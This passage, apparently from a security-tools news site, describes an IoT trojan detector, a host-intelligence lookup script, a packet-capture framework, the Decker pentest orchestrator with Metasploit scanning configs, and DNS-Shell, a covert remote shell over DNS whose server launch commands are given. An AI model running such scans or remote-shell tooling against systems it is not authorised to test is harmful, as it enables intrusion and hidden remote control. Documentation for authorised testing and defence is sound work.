  3. Device fingerprint database: normal network behaviors of each device, based on a whitelist. Calls APIs of the 360 threat intelligence database (https://ti.360.net/).
  4. Web server: there may be a web server in the second generation.

Procedure
devices connected --> data_flow_catcher --> flow_analyze_engine
flow_analyze_engine <--> device_fingerprint_database
flow_analyze_engine <--> web_server <-- user interfaces
web_server --> 360 threat intelligence database
The tool works as an access point that devices under test connect to manually; it sends their network traffic to the traffic analyzing engine for characteristic extraction. The traffic analyzing engine compares characteristics with entries in the device fingerprint database to recognize the device type and suspicious network connections. The device fingerprint database is a collection of normal behaviors of each device, based on a whitelist. Additionally, characteristics are searched in the Qihoo 360 threat intelligence database to identify malicious behaviors. A web server is set up as the user interface.

Effectiveness
In our research, we have successfully implanted Trojans in eight devices including smart speakers, cameras, driving recorders and mobile translators with IoT-Implant-Toolkit.
A demo video below:



We collected characteristics of those devices and ran IoT-Home-Guard. All devices implanted with Trojans were detected. We believe that malicious behaviors of more devices can be identified with high accuracy once the fingerprint database is supplemented.


Hostintel - A Modular Python Application To Collect Intelligence For Malicious Hosts


This tool is used to collect various intelligence sources for hosts. Hostintel is written in a modular fashion so new intelligence sources can be easily added.
Hosts are identified by FQDN host name, Domain, or IP address. This tool only supports IPv4 at the moment. The output is in CSV format and sent to STDOUT so the data can be saved or piped into another program. Since the output is in CSV format, spreadsheets such as Excel or database systems will easily be able to import the data.
I created a short introduction for this tool on YouTube: https://youtu.be/aYK0gILDA6w
This works with Python v2, but it should also work with Python v3. If you find it does not work with Python v3 please post an issue.

Help Screen:
$ python hostintel.py -h
usage: hostintel.py [-h] [-a] [-d] [-v] [-p] [-s] [-c] [-t] [-o] [-i] [-r]
ConfigurationFile InputFile

Modular application to look up host intelligence information. Outputs CSV to
STDOUT. This application will not output information until it has finished all
of the input.

positional arguments:
ConfigurationFile Configuration file
InputFile Input file, one host per line (IP, domain, or FQDN
host name)

optional arguments:
-h, --help show this help message and exit
-a, --all Perform All Lookups.
-d, --dns DNS Lookup.
-v, --virustotal VirusTotal Lookup.
-p, --passivetotal PassiveTotal Lookup.
-s, --shodan Shodan Lookup.
-c, --censys Censys Lookup.
-t, --threatcrowd ThreatCrowd Lookup.
-o, --otx OTX by AlienVault Lookup.
-i, --isc Internet Storm Center DShield Lookup.
-r, --carriagereturn Use carriage returns with new lines on csv.

Install:
First, make sure your configuration file is correct for your computer/installation. Add your API keys and usernames as appropriate in the configuration file. Python and Pip are required to run this tool. There are modules that must be installed from GitHub, so be sure the git command is available from your command line. Git is easy to install for any platform. Next, install the python requirements (run this each time you git pull this repository too):
$ pip install -r requirements.txt
There have been some problems with the stock version of Python on Mac OSX (http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure). You may have to install the security portion of the requests library with the following command:
$ pip install requests[security]
Lastly, I am a fan of virtualenv for Python. To make a customized local installation of Python to run this tool, I recommend you read: http://docs.python-guide.org/en/latest/dev/virtualenvs/
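If you go the virtualenv route, a minimal setup (the directory name is illustrative) looks like:
$ virtualenv venv
$ source venv/bin/activate
$ pip install -r requirements.txt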

Running:
$ python hostintel.py myconfigfile.conf myhosts.txt -a > myoutput.csv
You should be able to import myoutput.csv into any database or spreadsheet program.
Note that depending on your network, your API key limits, and the data you are searching for, this script can run for a very long time! Use each module sparingly! In return for the long wait, you save yourself from having to pull this data manually.

Sample Data:
There is some sample data in the "sampledata" directory. The IPs, domains, and hosts were picked at random and by no means is meant to target any organization or individual. Running this tool on the sample data works in the following way:

Small Hosts List:
$ python hostintel.py local/config.conf sampledata/smalllist.txt -a > sampledata/smalllist.csv
*** Processing 8.8.8.8 ***
*** Processing 8.8.4.4 ***
*** Processing 192.168.1.1 ***
*** Processing 10.0.0.1 ***
*** Processing google.com ***
*** Processing 212.227.247.242 ***
*** Writing Output ***

Larger Hosts List:
$ python hostintel.py local/config.conf sampledata/largerlist.txt -a > sampledata/largerlist.csv
*** Processing 114.34.84.13 ***
*** Processing 116.102.34.212 ***
*** Processing 118.75.180.168 ***
*** Processing 123.195.184.13 ***
*** Processing 14.110.216.236 ***
*** Processing 14.173.147.69 ***
*** Processing 14.181.192.151 ***
*** Processing 146.120.11.66 ***
*** Processing 163.172.149.131 ***

...

*** Processing 54.239.26.180 ***
*** Processing 62.141.39.155 ***
*** Processing 71.6.135.131 ***
*** Processing 72.30.2.74 ***
*** Processing 74.125.34.101 ***
*** Processing 83.31.179.71 ***
*** Processing 85.25.217.155 ***
*** Processing 93.174.93.94 ***
*** Writing Output ***

Intelligence Sources:
You can get API keys at the sites below for your configuration file.

Resources:

Notes:
Crude notes are available here.


PFQ - Functional Network Framework For Multi-Core Architectures


PFQ is a functional framework designed for the Linux operating system built for efficient packets capture/transmission (10G, 40G and beyond), in-kernel functional processing, kernel-bypass and packets steering across groups of sockets/end-points.
It is highly optimized for multi-core architecture, as well as for network devices equipped with multiple hardware queues. Compliant with any NIC, it provides a script that generates accelerated network device drivers starting from the source code.
PFQ enables the development of high-performance network applications, and it is shipped with a custom version of libpcap that accelerates and parallelizes legacy applications. Besides, a pure functional language designed for early-stage in-kernel packet processing is included: pfq-lang.
Pfq-Lang is inspired by Haskell and is intended to define applications that run on top of network device drivers. Through pfq-lang it is possible to build efficient bridges, port mirrors, simple firewalls, network balancers and so forth.
The framework includes the source code of the PFQ kernel module, user-space libraries for C, C++11-14, Haskell language, an accelerated pcap library, an implementation of pfq-lang as eDSL for C++/Haskell, an experimental pfq-lang compiler and a set of diagnostic tools.

Features
  • Data-path with full lock-free architecture.
  • Preallocated pools of socket buffers.
  • Compliant with a plethora of network devices drivers.
  • Rx and Tx line-rate on 10-Gbit links (14.8 Mpps), tested with Intel ixgbe vanilla drivers.
  • Transparent support of kernel threads for asynchronous packets transmission.
  • Transmission with active timestamping.
  • Groups of sockets which enable concurrent monitoring of multiple multi-threaded applications.
  • Per-group packet steering through randomized hashing or deterministic classification.
  • Per-group Berkeley and VLAN filters.
  • User-space libraries for C, C++11-14 and Haskell language.
  • Functional engine for in-kernel packet processing with pfq-lang.
  • pfq-lang eDSL for C++11-14 and Haskell language.
  • pfq-lang compiler used to parse and compile pfq-lang programs.
  • Accelerated pcap library for legacy applications (line-speed tested with captop).
  • I/O user<->kernel memory-mapped communications allocated on top of HugePages.
  • pfqd daemon used to configure and parallelize (pcap) legacy applications.
  • pfq-omatic script that automatically accelerates vanilla drivers.

Publications
  • "PFQ: a Novel Engine for Multi-Gigabit Packet Capturing With Multi-Core Commodity Hardware": Best-Paper-Award at PAM2012, paper avaiable from here
  • "A Purely Functional Approach to Packet Processing": ANCS 2014 Conference (October 2014, Marina del Rey)
  • "Network Traffic Processing with PFQ": JSAC-SI-MT/IEEE journal Special Issue on Measuring and Troubleshooting the Internet (March 2016)
  • "Enabling Packet Fan--Out in the libpcap Library for Parallel Traffic Processing": Network Traffic Measurement and Analysis Conference (TMA 2017)
  • "A Pipeline Functional Language for Stateful Packet Processing": IEEE International Workshop on NEtwork Accelerated FunctIOns (NEAF-IO '17)
  • "The Acceleration of OfSoftSwitch": IEEE Conference on Network Function Virtualization and Software Defined Networks (NFV-SDN '17)

Invited talks
  • "Functional Network Programming" at Tyrrhenian International Workshop on Digital Communication - (Sep. 2016)
  • "Software Accelerations for Network Applications" at NetV IRISA / Technicolor Workshop on Network Virtualization (Feb. 2017)

Author
Nicola Bonelli nicola@pfq.io

Contributors (in chronological order)
Andrea Di Pietro andrea.dipietro@for.unipi.it
Loris Gazzarrini loris.gazzarrini@iet.unipi.it
Gregorio Procissi g.procissi@iet.unipi.it
Giacomo Volpi volpi.gia@gmail.com
Luca Abeni abeni@dit.unitn.it
Tolysz tolysz@gmail.com
LSB leebutterman@gmail.com
Andrey Korolyov andrey@xdel.ru
MrClick valerio.click@gmx.com
Paul Emmerich emmericp@net.in.tum.de
Bach Le bach@bullno1.com
Marian Jancar jancar.marian@gmail.com
nizq ni.zhiqiang@gmail.com
Giuseppe Sucameli brush.tyler@gmail.com
Sergio Borghese s.borghese@netresults.it
Fabio Del Vigna fabio.delvigna@larthia.com

HomePages
PFQ home-page is www.pfq.io


Decker - Declarative Penetration Testing Orchestration Framework


Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.

Example of a decker config file:
// variables are pulled from environment
// ex: DECKER_TARGET_HOST
// they will be available throughout the config files as var.*
// ex: ${var.target_host}
variable "target_host" {
  type = "string"
}

// resources refer to plugins
// resources need unique names so plugins can be used more than once
// they are declared with the form: 'resource "plugin_name" "unique_name" {}'
// their outputs will be available to others using the form unique_name.*
// ex: nmap.443
resource "nmap" "nmap" {
  host           = "${var.target_host}"
  plugin_enabled = "true"
}

resource "sslscan" "sslscan" {
  host           = "${var.target_host}"
  plugin_enabled = "${nmap.443 == "open"}"
}
Run a plugin for each item in a list:
variable "target_host" {
type = "string"
}
resource "nslookup" "nslookup" {
dns_server = "8.8.4.4"
host = "${var.target_host}"
}
resource "metasploit" "metasploit" {
for_each = "${nslookup.ip_address}"
exploit = "auxiliary/scanner/portscan/tcp"
options = {
RHOSTS = "${each.key}/32"
INTERFACE = "eth0"
}
}
Complex configuration combining for_each with nested values:
variable "target_host" {
type = "string"
}
resource "nslookup" "nslookup" {
dns_server = "8.8.4.4"
host = "${var.target_host}"
}
resource "nmap" "nmap" {
for_each = "${nslookup.ip_address}"
host = "${each.key}"
}
// for each IP, check if nmap found port 25 open.
// if yes, run metasploit's smtp_enum scanner
resource "metasploit" "metasploit" {
for_each = "${nslookup.ip_address}"
exploit = "auxiliary/scanner/smtp/smtp_enum"
options = {
RHOSTS = "${each.key}"
}
plugin_enabled = "${nmap["${each.key}"].25 == "open"}"
}

Output formats
Several output formats are available and more than one can be selected at the same time.
Setting DECKER_OUTPUTS_JSON or DECKER_OUTPUTS_XML to "true" will output json and xml formatted files respectively.
  1. Output .json files in addition to plain text: export DECKER_OUTPUTS_JSON="true"
  2. Output .xml files in addition to plain text: export DECKER_OUTPUTS_XML="true"

Why the name decker?
My friend Courtney came to the rescue when I was struggling to come up with a name and found decker in a SciFi word glossary... and it sounded cool.
A future cracker; a software expert skilled at manipulating cyberspace, especially at circumventing security precautions.

Running an example config with docker
Two volumes are mounted:
  1. Directory named decker-reports where decker will output a file for each plugin executed. The file's name will be {unique_resource_name}.report.txt.
  2. examples directory containing decker config files. Mounting this volume allows you to write configs locally using your favorite editor and still run them within the container.
One environment variable is passed in:
  1. DECKER_TARGET_HOST
This is referenced in the config files as ${var.target_host}. Decker will loop through all environment variables named DECKER_*, stripping away the prefix and setting the rest to lowercase.
docker run -it --rm \
  -v "$(pwd)/decker-reports/":/tmp/reports/ \
  -v "$(pwd)/examples/":/decker-config/ \
  -e DECKER_TARGET_HOST=example.com \
  stevenaldinger/decker:kali decker ./decker-config/example.hcl
When decker finishes running the config, look in ./decker-reports for the outputs.

Running an example config without docker
You'll likely want to set the directory decker writes reports to with the DECKER_REPORTS_DIR environment variable.
Something like this would be appropriate. Just make sure whatever you set it to is an existing directory.
export DECKER_REPORTS_DIR="$HOME/decker-reports"
You'll also need to set a target host if you're running one of the example config files.
export DECKER_TARGET_HOST="<insert hostname here>"
Then just run a config file. Change to the root directory of this repo and run:
./decker ./examples/example.hcl

Contributing
Contributions are very welcome and appreciated. See docs/contributions.md for guidelines.

Development
Using docker for development is recommended for a smooth experience. This ensures all dependencies will be installed and ready to go.
Refer to Directory Structure below for an overview of the go code.

Quick Start
  1. (on host machine): make docker_build
  2. (on host machine): make docker_run (will start docker container and open an interactive bash session)
  3. (inside container): dep ensure -v
  4. (inside container): make build_all
  5. (inside container): make run

Initialize git hooks
Run make init to add a pre-commit script that will run linting and tests on each commit.

Plugin Development
Decker itself is just a framework that reads config files, determines dependencies in the config files, and runs plugins in an order that ensures plugins with dependencies on other plugins (output of one plugin being an input for another) run after the ones they depend on.
The real power of decker comes from plugins. Developing a plugin can be as simple or as complex as you want it to be, as long as the end result is a .so file containing the compiled plugin code and a .hcl file in the same directory declaring the inputs the plugin is expecting a user to configure.
The recommended way to get started with decker plugin development is by cloning the decker-plugin repository and following the steps in its documentation. It should only take you a few minutes to get a "Hello World" decker plugin running.

Installing plugins
By default, plugins are expected to be in a directory relative to wherever the decker binary is, at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.so. Additional paths can be added by setting the DECKER_PLUGIN_DIRS environment variable. The default plugin path will still be used if DECKER_PLUGIN_DIRS is set.
Example: export DECKER_PLUGIN_DIRS="/path/to/my/plugins:/additional/path/to/plugins"
There should be an HCL file next to the .so file at <decker binary>/internal/app/decker/plugins/<plugin name>/<plugin name>.hcl that defines its inputs and outputs. Currently, only string, list, and map inputs are supported. Each input should have an input block that looks like this:
input "my_input" {
type = "string"
default = "some default value"
}
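For illustration (the plugin and resource names here are hypothetical), a decker config file would then set that input as an attribute of the corresponding resource block:
resource "my_plugin" "example" {
  my_input = "value overriding the default"
}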

Directory Structure
.
├── build
│   ├── ci/
│   └── package/
├── cmd
│   ├── decker
│   │   └── main.go
│   └── README.md
├── deployments/
├── docs/
├── examples
│   └── example.hcl
├── githooks
│   ├── pre-commit
├── Gopkg.toml
├── internal
│   ├── app
│   │   └── decker
│   │   └── plugins
│   │   ├── a2sv
│   │   │   ├── a2sv.hcl
│   │   │   ├── main.go
│   │   │   └── README.md
│   │   └── ...
│   │   ├── main.go
│   │   ├── README.md
│   │   └── xxx.hcl
│   ├── pkg
│   │   ├── dependencies/
│   │   ├── gocty/
│   │   ├── hcl/
│   │   ├── paths/
│   │   ├── plugins/
│   │   └── reports/
│   └── README.md
├── LICENSE
├── Makefile
├── README.md
└── scripts
    ├── build-plugins.sh
    └── README.md
  • cmd/decker/main.go is the driver. Its job is to parse a given config file, load the appropriate plugins based on the file's resource blocks, and run the plugins with the specified inputs.
  • examples has a couple example configurations to get you started with decker. If you use the kali docker image (stevenaldinger/decker:kali), all dependencies should be installed for all config files and things should run smoothly.
  • internal/pkg is where most of the actual code is. It contains all the packages imported by main.go.
    • dependencies is responsible for building the plugin dependency graph and returning a topologically sorted array that ensures plugins are run in a working order.
    • gocty offers helpers for encoding and decoding go-cty values which are used to handle dynamic input types.
    • hcl is responsible for parsing HCL files, including creating evaluation contexts that let blocks properly decode when they depend on other plugin blocks.
    • paths is responsible for returning file paths for the decker binary, config files, plugin config files, and generated reports.
    • plugins is responsible for determining if plugins are enabled and running them.
    • reports is responsible for writing reports to the file system.
  • internal/app/decker/plugins are modular pieces of code written as Golang plugins, implementing a simple interface that allows them to be loaded and called at run-time with inputs and outputs specified in the plugin's config file (also in HCL). An example can be found at internal/app/decker/plugins/nslookup/nslookup.hcl.
  • decker config files offer a declarative way to write penetration tests. The manifests are written in HashiCorp Configuration Language 2 and describe the set of plugins to be used in the test as well as their inputs.


DNS-Shell - An Interactive Shell Over DNS Channel


DNS-Shell is an interactive shell over a DNS channel. The server is Python based and can run on any operating system that has Python installed; the payload is an encoded PowerShell command.

Understanding DNS-Shell
The payload is generated when the server script is invoked; it simply utilizes nslookup to perform the queries and poll the server for new commands. The server then listens on port 53 for incoming communications; once the payload is executed on the target machine, the server will spawn an interactive shell.
Once the channel is established, the payload will continuously query the server for commands; if a new command is entered, it will execute it and return the result back to the server.

Using DNS-Shell
Running DNS-Shell is relatively simple
DNS-Shell supports two modes of operation, direct and recursive:
  • Perform a git clone from our DNS-shell Github page
  • DNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP]
  • DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain]

